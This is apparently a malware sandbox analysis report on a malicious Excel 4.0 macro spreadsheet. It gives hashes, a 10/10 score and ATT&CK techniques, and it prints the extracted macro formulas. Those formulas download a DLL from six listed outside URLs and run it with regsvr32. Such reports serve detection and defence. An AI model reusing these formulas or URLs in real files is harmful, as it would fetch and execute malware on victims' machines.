Overview

overview

10

Static

static

10

48f3ef54ff...7.xlsm

windows7-x64

10

48f3ef54ff...7.xlsm

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067.xlsm

  • Size

    46KB

  • Sample

    230212-sq122sec4s

  • MD5

    07f30f1fa5420f050ea5929af0f95265

  • SHA1

    6310b51fca4003fb36252367f058c2e990ba5734

  • SHA256

    48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067

  • SHA512

    f16cad27fc864c23ed1c753f5eb319bf79f9d96c40edc70924b25410d5547c2c1bbb4c06b002f8e2bb246d35408bd4fa0e2e526a36ceb344fa399324e2758c80

  • SSDEEP

    768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://eles-tech.com/css/KzMysMqFMs/

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

https://txpcrescue.com/cgi-bin/5tSO8/

http://hadramout21.com/jetpack-temp/Py/

http://haribuilders.com/zoombox-master/4HYGX/

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://eles-tech.com/css/KzMysMqFMs/
xlm40.dropper

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

Targets

    • Target

      48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067.xlsm

    • Size

      46KB

    • MD5

      07f30f1fa5420f050ea5929af0f95265

    • SHA1

      6310b51fca4003fb36252367f058c2e990ba5734

    • SHA256

      48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067

    • SHA512

      f16cad27fc864c23ed1c753f5eb319bf79f9d96c40edc70924b25410d5547c2c1bbb4c06b002f8e2bb246d35408bd4fa0e2e526a36ceb344fa399324e2758c80

    • SSDEEP

      768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks